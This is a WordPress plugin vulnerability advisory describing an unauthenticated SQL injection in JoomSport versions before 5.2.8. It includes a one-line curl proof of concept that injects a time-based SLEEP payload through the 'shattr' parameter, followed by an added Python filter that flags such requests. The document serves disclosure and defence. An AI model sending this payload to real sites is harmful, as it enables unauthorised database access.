WordPress Plugin Vulnerabilities
JoomSport < 5.2.8 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
Proof of Concept
1. Install the vulnerable plugin (joomsport-sports-league-results-management version 5.2.6), skip the demo data import when prompted
2. Invoke the following curl command to induce a 10 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load' \
  --data 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'
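For sites that cannot update straight away, the request shape in the proof of concept can be checked in access-log review or a request filter. The following is an added example, not code from the plugin or from this advisory; it assumes a legitimate `id` inside `shattr` is a plain non-negative integer, and the function and sample names are hypothetical.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "joomsport_md_load"
# Assumption: a legitimate shattr "id" is a plain non-negative integer.
INT_RE = re.compile(r"\d+")

# Constructed sample requests; the second body is the payload from the PoC above.
URL = "https://example.com/wp-admin/admin-ajax.php?action=joomsport_md_load"
SAMPLES = [
    (URL, 'mdId=1&shattr={"id":"1"}'),
    (URL, 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(5))aaaa);-- -"}'),
    ("https://example.com/wp-admin/admin-ajax.php?action=heartbeat", "interval=60"),
]


def check_request(url, body):
    """Return None for unrelated requests, otherwise "ok" or a "suspicious: ..." verdict."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, separator="&")
    form = parse_qs(body, separator="&", keep_blank_values=True)
    action = (query.get("action") or form.get("action") or [""])[0]
    if not parts.path.endswith(AJAX_PATH) or action != ACTION:
        return None
    try:
        attrs = json.loads((form.get("shattr") or [""])[0])
    except ValueError:
        return "suspicious: shattr is not valid JSON"
    if not isinstance(attrs, dict):
        return "suspicious: shattr is not a JSON object"
    if "id" not in attrs:
        return "ok"  # nothing to validate in this sketch
    value = attrs["id"]
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        return "suspicious: id has unexpected type"
    if not INT_RE.fullmatch(str(value)):
        return "suspicious: non-numeric id"
    return "ok"


if __name__ == "__main__":
    for url, body in SAMPLES:
        print(check_request(url, body), "<-", body[:40])
```

A filter like this is a stopgap for triage and blocking; the fix is updating the plugin to 5.2.8 or later.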
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-28 (about 1 year ago)
Added
2022-11-28 (about 1 year ago)
Last Updated
2022-11-28 (about 1 year ago)